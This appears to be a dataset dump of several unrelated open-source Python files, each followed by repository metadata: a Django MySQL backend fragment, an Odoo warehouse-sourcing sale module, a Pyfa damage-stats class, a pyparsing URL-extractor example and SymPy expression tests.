ON (REFERRING.`%s` = REFERRED.`%s`)
WHERE REFERRING.`%s` IS NOT NULL AND REFERRED.`%s` IS NULL"""
% (primary_key_column_name, column_name, table_name, referenced_table_name,
column_name, referenced_column_name, column_name, referenced_column_name))
for bad_row in cursor.fetchall():
raise utils.IntegrityError("The row in table '%s' with primary key '%s' has an invalid "
"foreign key: %s.%s contains a value '%s' that does not have a corresponding value in %s.%s."
% (table_name, bad_row[0],
table_name, column_name, bad_row[1],
referenced_table_name, referenced_column_name))
def is_usable(self):
try:
self.connection.ping()
except Database.Error:
return False
else:
return True
@cached_property
def mysql_version(self):
with self.temporary_connection():
server_info = self.connection.get_server_info()
match = server_version_re.match(server_info)
if not match:
raise Exception('Unable to determine MySQL version from version string %r' % server_info)
return tuple(int(x) for x in match.groups())
| mit | -2,545,230,625,577,020,400 | 41.470745 | 117 | 0.637235 | false |
anas-taji/sale-workflow | sale_sourced_by_line/model/sale.py | 33 | 2963 | # -*- coding: utf-8 -*-
#
#
# Author: Guewen Baconnier, Yannick Vaucher
# Copyright 2013-2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
from openerp import models, api, fields
from openerp.osv import orm
class SaleOrder(models.Model):
_inherit = 'sale.order'
def _prepare_order_line_procurement(self, cr, uid, order, line,
group_id=False, context=None):
values = super(SaleOrder, self)._prepare_order_line_procurement(
cr, uid, order, line, group_id=group_id, context=context)
if line.warehouse_id:
values['warehouse_id'] = line.warehouse_id.id
return values
@api.model
def _prepare_procurement_group_by_line(self, line):
vals = super(SaleOrder, self)._prepare_procurement_group_by_line(line)
# for compatibility with sale_quotation_sourcing
if line._get_procurement_group_key()[0] == 8:
if line.warehouse_id:
vals['name'] += '/' + line.warehouse_id.name
return vals
SO_STATES = {
'cancel': [('readonly', True)],
'progress': [('readonly', True)],
'manual': [('readonly', True)],
'shipping_except': [('readonly', True)],
'invoice_except': [('readonly', True)],
'done': [('readonly', True)],
}
warehouse_id = fields.Many2one(
'stock.warehouse',
'Default Warehouse',
states=SO_STATES,
help="If no source warehouse is selected on line, "
"this warehouse is used as default. ")
class SaleOrderLine(orm.Model):
_inherit = 'sale.order.line'
warehouse_id = fields.Many2one(
'stock.warehouse',
'Source Warehouse',
help="If a source warehouse is selected, "
"it will be used to define the route. "
"Otherwise, it will get the warehouse of "
"the sale order")
@api.multi
def _get_procurement_group_key(self):
""" Return a key with priority to be used to regroup lines in multiple
procurement groups
"""
priority = 8
key = super(SaleOrderLine, self)._get_procurement_group_key()
# Check priority
if key[0] >= priority:
return key
return (priority, self.warehouse_id.id)
| agpl-3.0 | -6,150,837,192,120,776,000 | 33.858824 | 78 | 0.617955 | false |
blitzmann/Pyfa | eos/utils/stats.py | 1 | 2381 | # ===============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of eos.
#
# eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with eos. If not, see <http://www.gnu.org/licenses/>.
# ===============================================================================
class DmgTypes:
"""Container for damage data stats."""
def __init__(self, em, thermal, kinetic, explosive):
self.em = em
self.thermal = thermal
self.kinetic = kinetic
self.explosive = explosive
self._calcTotal()
# Iterator is needed to support tuple-style unpacking
def __iter__(self):
yield self.em
yield self.thermal
yield self.kinetic
yield self.explosive
yield self.total
def __eq__(self, other):
if not isinstance(other, DmgTypes):
return NotImplemented
return all((
self.em == other.em,
self.thermal == other.thermal,
self.kinetic == other.kinetic,
self.explosive == other.explosive,
self.total == other.total))
def __bool__(self):
return any((
self.em, self.thermal, self.kinetic,
self.explosive, self.total))
def _calcTotal(self):
self.total = self.em + self.thermal + self.kinetic + self.explosive
def __add__(self, other):
return type(self)(
em=self.em + other.em,
thermal=self.thermal + other.thermal,
kinetic=self.kinetic + other.kinetic,
explosive=self.explosive + other.explosive)
def __iadd__(self, other):
self.em += other.em
self.thermal += other.thermal
self.kinetic += other.kinetic
self.explosive += other.explosive
self._calcTotal()
return self
| gpl-3.0 | 253,944,888,759,681,920 | 33.014286 | 81 | 0.582108 | false |
chrisdew/pyparsing-autocomplete | examples/urlExtractor.py | 16 | 1749 | # URL extractor
# Copyright 2004, Paul McGuire
from pyparsing import Literal,Suppress,CharsNotIn,CaselessLiteral,\
Word,dblQuotedString,alphanums,SkipTo
import urllib
import pprint
# Define the pyparsing grammar for a URL, that is:
# URLlink ::= <a href= URL>linkText</a>
# URL ::= doubleQuotedString | alphanumericWordPath
# Note that whitespace may appear just about anywhere in the link. Note also
# that it is not necessary to explicitly show this in the pyparsing grammar; by default,
# pyparsing skips over whitespace between tokens.
linkOpenTag = (Literal("<") + "a" + "href" + "=").suppress() + \
( dblQuotedString | Word(alphanums+"/") ) + \
Suppress(">")
linkCloseTag = Literal("<") + "/" + CaselessLiteral("a") + ">"
link = linkOpenTag + SkipTo(linkCloseTag) + linkCloseTag.suppress()
# Go get some HTML with some links in it.
serverListPage = urllib.urlopen( "http://www.yahoo.com" )
htmlText = serverListPage.read()
serverListPage.close()
# scanString is a generator that loops through the input htmlText, and for each
# match yields the tokens and start and end locations (for this application, we are
# not interested in the start and end values).
for toks,strt,end in link.scanString(htmlText):
print toks.asList()
# Rerun scanString, but this time create a dict of text:URL key-value pairs.
# Need to reverse the tokens returned by link, using a parse action.
link.setParseAction( lambda st,loc,toks: [ toks[1], toks[0] ] )
# Create dictionary from list comprehension, assembled from each pair of tokens returned
# from a matched URL.
pprint.pprint(
dict( [ toks for toks,strt,end in link.scanString(htmlText) ] )
)
| mit | 2,925,555,085,771,994,600 | 39.642857 | 89 | 0.697541 | false |
lidavidm/sympy | sympy/core/tests/test_expr.py | 3 | 54640 | from __future__ import division
from sympy import (Add, Basic, S, Symbol, Wild, Float, Integer, Rational, I,
sin, cos, tan, exp, log, nan, oo, sqrt, symbols, Integral, sympify,
WildFunction, Poly, Function, Derivative, Number, pi, NumberSymbol, zoo,
Piecewise, Mul, Pow, nsimplify, ratsimp, trigsimp, radsimp, powsimp,
simplify, together, collect, factorial, apart, combsimp, factor, refine,
cancel, Tuple, default_sort_key, DiracDelta, gamma, Dummy, Sum, E,
exp_polar, Lambda, expand, diff, O)
from sympy.core.function import AppliedUndef
from sympy.physics.secondquant import FockState
from sympy.physics.units import meter
from sympy.core.compatibility import xrange
from sympy.utilities.pytest import raises, XFAIL
from sympy.abc import a, b, c, n, t, u, x, y, z
class DummyNumber(object):
"""
Minimal implementation of a number that works with SymPy.
If one has a Number class (e.g. Sage Integer, or some other custom class)
that one wants to work well with SymPy, one has to implement at least the
methods of this class DummyNumber, resp. its subclasses I5 and F1_1.
Basically, one just needs to implement either __int__() or __float__() and
then one needs to make sure that the class works with Python integers and
with itself.
"""
def __radd__(self, a):
if isinstance(a, (int, float)):
return a + self.number
return NotImplemented
def __truediv__(a, b):
return a.__div__(b)
def __rtruediv__(a, b):
return a.__rdiv__(b)
def __add__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number + a
return NotImplemented
def __rsub__(self, a):
if isinstance(a, (int, float)):
return a - self.number
return NotImplemented
def __sub__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number - a
return NotImplemented
def __rmul__(self, a):
if isinstance(a, (int, float)):
return a * self.number
return NotImplemented
def __mul__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number * a
return NotImplemented
def __rdiv__(self, a):
if isinstance(a, (int, float)):
return a / self.number
return NotImplemented
def __div__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number / a
return NotImplemented
def __rpow__(self, a):
if isinstance(a, (int, float)):
return a ** self.number
return NotImplemented
def __pow__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number ** a
return NotImplemented
def __pos__(self):
return self.number
def __neg__(self):
return - self.number
class I5(DummyNumber):
number = 5
def __int__(self):
return self.number
class F1_1(DummyNumber):
number = 1.1
def __float__(self):
return self.number
i5 = I5()
f1_1 = F1_1()
# basic sympy objects
basic_objs = [
Rational(2),
Float("1.3"),
x,
y,
pow(x, y)*y,
]
# all supported objects
all_objs = basic_objs + [
5,
5.5,
i5,
f1_1
]
def dotest(s):
for x in all_objs:
for y in all_objs:
s(x, y)
return True
def test_basic():
def j(a, b):
x = a
x = +a
x = -a
x = a + b
x = a - b
x = a*b
x = a/b
x = a**b
assert dotest(j)
def test_ibasic():
def s(a, b):
x = a
x += b
x = a
x -= b
x = a
x *= b
x = a
x /= b
assert dotest(s)
def test_relational():
assert (pi < 3) is False
assert (pi <= 3) is False
assert (pi > 3) is True
assert (pi >= 3) is True
assert (-pi < 3) is True
assert (-pi <= 3) is True
assert (-pi > 3) is False
assert (-pi >= 3) is False
assert (x - 2 < x - 3) is False
def test_relational_assumptions():
from sympy import Lt, Gt, Le, Ge
m1 = Symbol("m1", nonnegative=False)
m2 = Symbol("m2", positive=False)
m3 = Symbol("m3", nonpositive=False)
m4 = Symbol("m4", negative=False)
assert (m1 < 0) == Lt(m1, 0)
assert (m2 <= 0) == Le(m2, 0)
assert (m3 > 0) == Gt(m3, 0)
assert (m4 >= 0) == Ge(m4, 0)
m1 = Symbol("m1", nonnegative=False, real=True)
m2 = Symbol("m2", positive=False, real=True)
m3 = Symbol("m3", nonpositive=False, real=True)
m4 = Symbol("m4", negative=False, real=True)
assert (m1 < 0) is True
assert (m2 <= 0) is True
assert (m3 > 0) is True
assert (m4 >= 0) is True
m1 = Symbol("m1", negative=True)
m2 = Symbol("m2", nonpositive=True)
m3 = Symbol("m3", positive=True)
m4 = Symbol("m4", nonnegative=True)
assert (m1 < 0) is True
assert (m2 <= 0) is True
assert (m3 > 0) is True
assert (m4 >= 0) is True
m1 = Symbol("m1", negative=False)
m2 = Symbol("m2", nonpositive=False)
m3 = Symbol("m3", positive=False)
m4 = Symbol("m4", nonnegative=False)
assert (m1 < 0) is False
assert (m2 <= 0) is False
assert (m3 > 0) is False
assert (m4 >= 0) is False
def test_relational_noncommutative():
from sympy import Lt, Gt, Le, Ge
A, B = symbols('A,B', commutative=False)
assert (A < B) == Lt(A, B)
assert (A <= B) == Le(A, B)
assert (A > B) == Gt(A, B)
assert (A >= B) == Ge(A, B)
def test_basic_nostr():
for obj in basic_objs:
raises(TypeError, lambda: obj + '1')
raises(TypeError, lambda: obj - '1')
if obj == 2:
assert obj * '1' == '11'
else:
raises(TypeError, lambda: obj * '1')
raises(TypeError, lambda: obj / '1')
raises(TypeError, lambda: obj ** '1')
def test_series_expansion_for_uniform_order():
assert (1/x + y + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + y + x).series(x, 0, 1) == 1/x + y + O(x)
assert (1/x + 1 + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + 1 + x).series(x, 0, 1) == 1/x + 1 + O(x)
assert (1/x + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + y + y*x + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + y + y*x + x).series(x, 0, 1) == 1/x + y + O(x)
def test_leadterm():
assert (3 + 2*x**(log(3)/log(2) - 1)).leadterm(x) == (3, 0)
assert (1/x**2 + 1 + x + x**2).leadterm(x)[1] == -2
assert (1/x + 1 + x + x**2).leadterm(x)[1] == -1
assert (x**2 + 1/x).leadterm(x)[1] == -1
assert (1 + x**2).leadterm(x)[1] == 0
assert (x + 1).leadterm(x)[1] == 0
assert (x + x**2).leadterm(x)[1] == 1
assert (x**2).leadterm(x)[1] == 2
def test_as_leading_term():
assert (3 + 2*x**(log(3)/log(2) - 1)).as_leading_term(x) == 3
assert (1/x**2 + 1 + x + x**2).as_leading_term(x) == 1/x**2
assert (1/x + 1 + x + x**2).as_leading_term(x) == 1/x
assert (x**2 + 1/x).as_leading_term(x) == 1/x
assert (1 + x**2).as_leading_term(x) == 1
assert (x + 1).as_leading_term(x) == 1
assert (x + x**2).as_leading_term(x) == x
assert (x**2).as_leading_term(x) == x**2
assert (x + oo).as_leading_term(x) == oo
def test_leadterm2():
assert (x*cos(1)*cos(1 + sin(1)) + sin(1 + sin(1))).leadterm(x) == \
(sin(1 + sin(1)), 0)
def test_leadterm3():
assert (y + z + x).leadterm(x) == (y + z, 0)
def test_as_leading_term2():
assert (x*cos(1)*cos(1 + sin(1)) + sin(1 + sin(1))).as_leading_term(x) == \
sin(1 + sin(1))
def test_as_leading_term3():
assert (2 + pi + x).as_leading_term(x) == 2 + pi
assert (2*x + pi*x + x**2).as_leading_term(x) == (2 + pi)*x
def test_as_leading_term4():
# see issue 3744
n = Symbol('n', integer=True, positive=True)
r = -n**3/(2*n**2 + 4*n + 2) - n**2/(n**2 + 2*n + 1) + \
n**2/(n + 1) - n/(2*n**2 + 4*n + 2) + n/(n*x + x) + 2*n/(n + 1) - \
1 + 1/(n*x + x) + 1/(n + 1) - 1/x
assert r.as_leading_term(x).cancel() == n/2
def test_as_leading_term_stub():
class foo(Function):
pass
assert foo(1/x).as_leading_term(x) == foo(1/x)
assert foo(1).as_leading_term(x) == foo(1)
raises(NotImplementedError, lambda: foo(x).as_leading_term(x))
def test_atoms():
assert x.atoms() == set([x])
assert (1 + x).atoms() == set([x, S(1)])
assert (1 + 2*cos(x)).atoms(Symbol) == set([x])
assert (1 + 2*cos(x)).atoms(Symbol, Number) == set([S(1), S(2), x])
assert (2*(x**(y**x))).atoms() == set([S(2), x, y])
assert Rational(1, 2).atoms() == set([S.Half])
assert Rational(1, 2).atoms(Symbol) == set([])
assert sin(oo).atoms(oo) == set([oo])
assert Poly(0, x).atoms() == set([S.Zero])
assert Poly(1, x).atoms() == set([S.One])
assert Poly(x, x).atoms() == set([x])
assert Poly(x, x, y).atoms() == set([x])
assert Poly(x + y, x, y).atoms() == set([x, y])
assert Poly(x + y, x, y, z).atoms() == set([x, y])
assert Poly(x + y*t, x, y, z).atoms() == set([t, x, y])
assert (I*pi).atoms(NumberSymbol) == set([pi])
assert (I*pi).atoms(NumberSymbol, I) == \
(I*pi).atoms(I, NumberSymbol) == set([pi, I])
assert exp(exp(x)).atoms(exp) == set([exp(exp(x)), exp(x)])
assert (1 + x*(2 + y) + exp(3 + z)).atoms(Add) == \
set([1 + x*(2 + y) + exp(3 + z), 2 + y, 3 + z])
# issue 3033
f = Function('f')
e = (f(x) + sin(x) + 2)
assert e.atoms(AppliedUndef) == \
set([f(x)])
assert e.atoms(AppliedUndef, Function) == \
set([f(x), sin(x)])
assert e.atoms(Function) == \
set([f(x), sin(x)])
assert e.atoms(AppliedUndef, Number) == \
set([f(x), S(2)])
assert e.atoms(Function, Number) == \
set([S(2), sin(x), f(x)])
def test_is_polynomial():
k = Symbol('k', nonnegative=True, integer=True)
assert Rational(2).is_polynomial(x, y, z) is True
assert (S.Pi).is_polynomial(x, y, z) is True
assert x.is_polynomial(x) is True
assert x.is_polynomial(y) is True
assert (x**2).is_polynomial(x) is True
assert (x**2).is_polynomial(y) is True
assert (x**(-2)).is_polynomial(x) is False
assert (x**(-2)).is_polynomial(y) is True
assert (2**x).is_polynomial(x) is False
assert (2**x).is_polynomial(y) is True
assert (x**k).is_polynomial(x) is False
assert (x**k).is_polynomial(k) is False
assert (x**x).is_polynomial(x) is False
assert (k**k).is_polynomial(k) is False
assert (k**x).is_polynomial(k) is False
assert (x**(-k)).is_polynomial(x) is False
assert ((2*x)**k).is_polynomial(x) is False
assert (x**2 + 3*x - 8).is_polynomial(x) is True
assert (x**2 + 3*x - 8).is_polynomial(y) is True
assert (x**2 + 3*x - 8).is_polynomial() is True
assert sqrt(x).is_polynomial(x) is False
assert (sqrt(x)**3).is_polynomial(x) is False
assert (x**2 + 3*x*sqrt(y) - 8).is_polynomial(x) is True
assert (x**2 + 3*x*sqrt(y) - 8).is_polynomial(y) is False
assert ((x**2)*(y**2) + x*(y**2) + y*x + exp(2)).is_polynomial() is True
assert ((x**2)*(y**2) + x*(y**2) + y*x + exp(x)).is_polynomial() is False
assert (
(x**2)*(y**2) + x*(y**2) + y*x + exp(2)).is_polynomial(x, y) is True
assert (
(x**2)*(y**2) + x*(y**2) + y*x + exp(x)).is_polynomial(x, y) is False
def test_is_rational_function():
assert Integer(1).is_rational_function() is True
assert Integer(1).is_rational_function(x) is True
assert Rational(17, 54).is_rational_function() is True
assert Rational(17, 54).is_rational_function(x) is True
assert (12/x).is_rational_function() is True
assert (12/x).is_rational_function(x) is True
assert (x/y).is_rational_function() is True
assert (x/y).is_rational_function(x) is True
assert (x/y).is_rational_function(x, y) is True
assert (x**2 + 1/x/y).is_rational_function() is True
assert (x**2 + 1/x/y).is_rational_function(x) is True
assert (x**2 + 1/x/y).is_rational_function(x, y) is True
assert (sin(y)/x).is_rational_function() is False
assert (sin(y)/x).is_rational_function(y) is False
assert (sin(y)/x).is_rational_function(x) is True
assert (sin(y)/x).is_rational_function(x, y) is False
def test_is_algebraic_expr():
assert sqrt(3).is_algebraic_expr(x) is True
assert sqrt(3).is_algebraic_expr() is True
eq = ((1 + x**2)/(1 - y**2))**(S(1)/3)
assert eq.is_algebraic_expr(x) is True
assert eq.is_algebraic_expr(y) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr(x) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr(y) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr() is True
assert (cos(y)/sqrt(x)).is_algebraic_expr() is False
assert (cos(y)/sqrt(x)).is_algebraic_expr(x) is True
assert (cos(y)/sqrt(x)).is_algebraic_expr(y) is False
assert (cos(y)/sqrt(x)).is_algebraic_expr(x, y) is False
def test_SAGE1():
#see http://code.google.com/p/sympy/issues/detail?id=247
class MyInt:
def _sympy_(self):
return Integer(5)
m = MyInt()
e = Rational(2)*m
assert e == 10
raises(TypeError, lambda: Rational(2)*MyInt)
def test_SAGE2():
class MyInt(object):
def __int__(self):
return 5
assert sympify(MyInt()) == 5
e = Rational(2)*MyInt()
assert e == 10
raises(TypeError, lambda: Rational(2)*MyInt)
def test_SAGE3():
class MySymbol:
def __rmul__(self, other):
return ('mys', other, self)
o = MySymbol()
e = x*o
assert e == ('mys', x, o)
def test_len():
e = x*y
assert len(e.args) == 2
e = x + y + z
assert len(e.args) == 3
def test_doit():
a = Integral(x**2, x)
assert isinstance(a.doit(), Integral) is False
assert isinstance(a.doit(integrals=True), Integral) is False
assert isinstance(a.doit(integrals=False), Integral) is True
assert (2*Integral(x, x)).doit() == x**2
def test_attribute_error():
raises(AttributeError, lambda: x.cos())
raises(AttributeError, lambda: x.sin())
raises(AttributeError, lambda: x.exp())
def test_args():
assert (x*y).args in ((x, y), (y, x))
assert (x + y).args in ((x, y), (y, x))
assert (x*y + 1).args in ((x*y, 1), (1, x*y))
assert sin(x*y).args == (x*y,)
assert sin(x*y).args[0] == x*y
assert (x**y).args == (x, y)
assert (x**y).args[0] == x
assert (x**y).args[1] == y
def test_iter_basic_args():
assert list(sin(x*y).iter_basic_args()) == [x*y]
assert list((x**y).iter_basic_args()) == [x, y]
def test_noncommutative_expand_issue658():
A, B, C = symbols('A,B,C', commutative=False)
assert A*B - B*A != 0
assert (A*(A + B)*B).expand() == A**2*B + A*B**2
assert (A*(A + B + C)*B).expand() == A**2*B + A*B**2 + A*C*B
def test_as_numer_denom():
a, b, c = symbols('a, b, c')
assert nan.as_numer_denom() == (nan, 1)
assert oo.as_numer_denom() == (oo, 1)
assert (-oo).as_numer_denom() == (-oo, 1)
assert zoo.as_numer_denom() == (zoo, 1)
assert (-zoo).as_numer_denom() == (zoo, 1)
assert x.as_numer_denom() == (x, 1)
assert (1/x).as_numer_denom() == (1, x)
assert (x/y).as_numer_denom() == (x, y)
assert (x/2).as_numer_denom() == (x, 2)
assert (x*y/z).as_numer_denom() == (x*y, z)
assert (x/(y*z)).as_numer_denom() == (x, y*z)
assert Rational(1, 2).as_numer_denom() == (1, 2)
assert (1/y**2).as_numer_denom() == (1, y**2)
assert (x/y**2).as_numer_denom() == (x, y**2)
assert ((x**2 + 1)/y).as_numer_denom() == (x**2 + 1, y)
assert (x*(y + 1)/y**7).as_numer_denom() == (x*(y + 1), y**7)
assert (x**-2).as_numer_denom() == (1, x**2)
assert (a/x + b/2/x + c/3/x).as_numer_denom() == \
(6*a + 3*b + 2*c, 6*x)
assert (a/x + b/2/x + c/3/y).as_numer_denom() == \
(2*c*x + y*(6*a + 3*b), 6*x*y)
assert (a/x + b/2/x + c/.5/x).as_numer_denom() == \
(2*a + b + 4.0*c, 2*x)
# this should take no more than a few seconds
assert int(log(Add(*[Dummy()/i/x for i in xrange(1, 705)]
).as_numer_denom()[1]/x).n(4)) == 705
for i in [S.Infinity, S.NegativeInfinity, S.ComplexInfinity]:
assert (i + x/3).as_numer_denom() == \
(x + i, 3)
assert (S.Infinity + x/3 + y/4).as_numer_denom() == \
(4*x + 3*y + S.Infinity, 12)
assert (oo*x + zoo*y).as_numer_denom() == \
(zoo*y + oo*x, 1)
A, B, C = symbols('A,B,C', commutative=False)
assert (A*B*C**-1).as_numer_denom() == (A*B*C**-1, 1)
assert (A*B*C**-1/x).as_numer_denom() == (A*B*C**-1, x)
assert (C**-1*A*B).as_numer_denom() == (C**-1*A*B, 1)
assert (C**-1*A*B/x).as_numer_denom() == (C**-1*A*B, x)
assert ((A*B*C)**-1).as_numer_denom() == ((A*B*C)**-1, 1)
assert ((A*B*C)**-1/x).as_numer_denom() == ((A*B*C)**-1, x)
def test_as_independent():
assert (2*x*sin(x) + y + x).as_independent(x) == (y, x + 2*x*sin(x))
assert (2*x*sin(x) + y + x).as_independent(y) == (x + 2*x*sin(x), y)
assert (2*x*sin(x) + y + x).as_independent(x, y) == (0, y + x + 2*x*sin(x))
assert (x*sin(x)*cos(y)).as_independent(x) == (cos(y), x*sin(x))
assert (x*sin(x)*cos(y)).as_independent(y) == (x*sin(x), cos(y))
assert (x*sin(x)*cos(y)).as_independent(x, y) == (1, x*sin(x)*cos(y))
assert (sin(x)).as_independent(x) == (1, sin(x))
assert (sin(x)).as_independent(y) == (sin(x), 1)
assert (2*sin(x)).as_independent(x) == (2, sin(x))
assert (2*sin(x)).as_independent(y) == (2*sin(x), 1)
# issue 1804 = 1766b
n1, n2, n3 = symbols('n1 n2 n3', commutative=False)
assert (n1 + n1*n2).as_independent(n2) == (n1, n1*n2)
assert (n2*n1 + n1*n2).as_independent(n2) == (0, n1*n2 + n2*n1)
assert (n1*n2*n1).as_independent(n2) == (n1, n2*n1)
assert (n1*n2*n1).as_independent(n1) == (1, n1*n2*n1)
assert (3*x).as_independent(x, as_Add=True) == (0, 3*x)
assert (3*x).as_independent(x, as_Add=False) == (3, x)
assert (3 + x).as_independent(x, as_Add=True) == (3, x)
assert (3 + x).as_independent(x, as_Add=False) == (1, 3 + x)
# issue 2380
assert (3*x).as_independent(Symbol) == (3, x)
# issue 2549
assert (n1*x*y).as_independent(x) == (n1*y, x)
assert ((x + n1)*(x - y)).as_independent(x) == (1, (x + n1)*(x - y))
assert ((x + n1)*(x - y)).as_independent(y) == (x + n1, x - y)
assert (DiracDelta(x - n1)*DiracDelta(x - y)).as_independent(x) \
== (1, DiracDelta(x - n1)*DiracDelta(x - y))
assert (x*y*n1*n2*n3).as_independent(n2) == (x*y*n1, n2*n3)
assert (x*y*n1*n2*n3).as_independent(n1) == (x*y, n1*n2*n3)
assert (x*y*n1*n2*n3).as_independent(n3) == (x*y*n1*n2, n3)
assert (DiracDelta(x - n1)*DiracDelta(y - n1)*DiracDelta(x - n2)).as_independent(y) == \
(DiracDelta(x - n1)*DiracDelta(x - n2), DiracDelta(y - n1))
# issue 2685
assert (x + Integral(x, (x, 1, 2))).as_independent(x, strict=True) == \
(Integral(x, (x, 1, 2)), x)
def test_call():
# See the long history of this in issues 1927 and 2006.
raises(TypeError, lambda: sin(x)({ x : 1, sin(x) : 2}))
raises(TypeError, lambda: sin(x)(1))
# No effect as there are no callables
assert sin(x).rcall(1) == sin(x)
assert (1 + sin(x)).rcall(1) == 1 + sin(x)
# Effect in the pressence of callables
l = Lambda(x, 2*x)
assert (l + x).rcall(y) == 2*y + x
assert (x**l).rcall(2) == x**4
# TODO UndefinedFunction does not subclass Expr
#f = Function('f')
#assert (2*f)(x) == 2*f(x)
def test_replace():
f = log(sin(x)) + tan(sin(x**2))
assert f.replace(sin, cos) == log(cos(x)) + tan(cos(x**2))
assert f.replace(
sin, lambda a: sin(2*a)) == log(sin(2*x)) + tan(sin(2*x**2))
a = Wild('a')
b = Wild('b')
assert f.replace(sin(a), cos(a)) == log(cos(x)) + tan(cos(x**2))
assert f.replace(
sin(a), lambda a: sin(2*a)) == log(sin(2*x)) + tan(sin(2*x**2))
# test exact
assert (2*x).replace(a*x + b, b - a, exact=True) == 2*x
assert (2*x).replace(a*x + b, b - a) == 2/x
assert (2*x).replace(a*x + b, lambda a, b: b - a, exact=True) == 2*x
assert (2*x).replace(a*x + b, lambda a, b: b - a) == 2/x
g = 2*sin(x**3)
assert g.replace(
lambda expr: expr.is_Number, lambda expr: expr**2) == 4*sin(x**9)
assert cos(x).replace(cos, sin, map=True) == (sin(x), {cos(x): sin(x)})
assert sin(x).replace(cos, sin) == sin(x)
cond, func = lambda x: x.is_Mul, lambda x: 2*x
assert (x*y).replace(cond, func, map=True) == (2*x*y, {x*y: 2*x*y})
assert (x*(1 + x*y)).replace(cond, func, map=True) == \
(2*x*(2*x*y + 1), {x*(2*x*y + 1): 2*x*(2*x*y + 1), x*y: 2*x*y})
assert (y*sin(x)).replace(sin, lambda expr: sin(expr)/y, map=True) == \
(sin(x), {sin(x): sin(x)/y})
# if not simultaneous then y*sin(x) -> y*sin(x)/y = sin(x) -> sin(x)/y
assert (y*sin(x)).replace(sin, lambda expr: sin(expr)/y,
simultaneous=False) == sin(x)/y
assert (x**2 + O(x**3)).replace(Pow, lambda b, e: b**e/e) == O(1, x)
assert (x**2 + O(x**3)).replace(Pow, lambda b, e: b**e/e,
simultaneous=False) == x**2/2 + O(x**3)
assert (x*(x*y + 3)).replace(lambda x: x.is_Mul, lambda x: 2 + x) == \
x*(x*y + 5) + 2
e = (x*y + 1)*(2*x*y + 1) + 1
assert e.replace(cond, func, map=True) == (
2*((2*x*y + 1)*(4*x*y + 1)) + 1,
{2*x*y: 4*x*y, x*y: 2*x*y, (2*x*y + 1)*(4*x*y + 1):
2*((2*x*y + 1)*(4*x*y + 1))})
assert x.replace(x, y) == y
assert (x + 1).replace(1, 2) == x + 2
def test_find():
expr = (x + y + 2 + sin(3*x))
assert expr.find(lambda u: u.is_Integer) == set([S(2), S(3)])
assert expr.find(lambda u: u.is_Symbol) == set([x, y])
assert expr.find(lambda u: u.is_Integer, group=True) == {S(2): 1, S(3): 1}
assert expr.find(lambda u: u.is_Symbol, group=True) == {x: 2, y: 1}
assert expr.find(Integer) == set([S(2), S(3)])
assert expr.find(Symbol) == set([x, y])
assert expr.find(Integer, group=True) == {S(2): 1, S(3): 1}
assert expr.find(Symbol, group=True) == {x: 2, y: 1}
a = Wild('a')
expr = sin(sin(x)) + sin(x) + cos(x) + x
assert expr.find(lambda u: type(u) is sin) == set([sin(x), sin(sin(x))])
assert expr.find(
lambda u: type(u) is sin, group=True) == {sin(x): 2, sin(sin(x)): 1}
assert expr.find(sin(a)) == set([sin(x), sin(sin(x))])
assert expr.find(sin(a), group=True) == {sin(x): 2, sin(sin(x)): 1}
assert expr.find(sin) == set([sin(x), sin(sin(x))])
assert expr.find(sin, group=True) == {sin(x): 2, sin(sin(x)): 1}
def test_count():
expr = (x + y + 2 + sin(3*x))
assert expr.count(lambda u: u.is_Integer) == 2
assert expr.count(lambda u: u.is_Symbol) == 3
assert expr.count(Integer) == 2
assert expr.count(Symbol) == 3
assert expr.count(2) == 1
a = Wild('a')
assert expr.count(sin) == 1
assert expr.count(sin(a)) == 1
assert expr.count(lambda u: type(u) is sin) == 1
def test_has_basics():
f = Function('f')
g = Function('g')
p = Wild('p')
assert sin(x).has(x)
assert sin(x).has(sin)
assert not sin(x).has(y)
assert not sin(x).has(cos)
assert f(x).has(x)
assert f(x).has(f)
assert not f(x).has(y)
assert not f(x).has(g)
assert f(x).diff(x).has(x)
assert f(x).diff(x).has(f)
assert f(x).diff(x).has(Derivative)
assert not f(x).diff(x).has(y)
assert not f(x).diff(x).has(g)
assert not f(x).diff(x).has(sin)
assert (x**2).has(Symbol)
assert not (x**2).has(Wild)
assert (2*p).has(Wild)
assert not x.has()
def test_has_multiple():
f = x**2*y + sin(2**t + log(z))
assert f.has(x)
assert f.has(y)
assert f.has(z)
assert f.has(t)
assert not f.has(u)
assert f.has(x, y, z, t)
assert f.has(x, y, z, t, u)
i = Integer(4400)
assert not i.has(x)
assert (i*x**i).has(x)
assert not (i*y**i).has(x)
assert (i*y**i).has(x, y)
assert not (i*y**i).has(x, z)
def test_has_piecewise():
f = (x*y + 3/y)**(3 + 2)
g = Function('g')
h = Function('h')
p = Piecewise((g(x), x < -1), (1, x <= 1), (f, True))
assert p.has(x)
assert p.has(y)
assert not p.has(z)
assert p.has(1)
assert p.has(3)
assert not p.has(4)
assert p.has(f)
assert p.has(g)
assert not p.has(h)
def test_has_iterative():
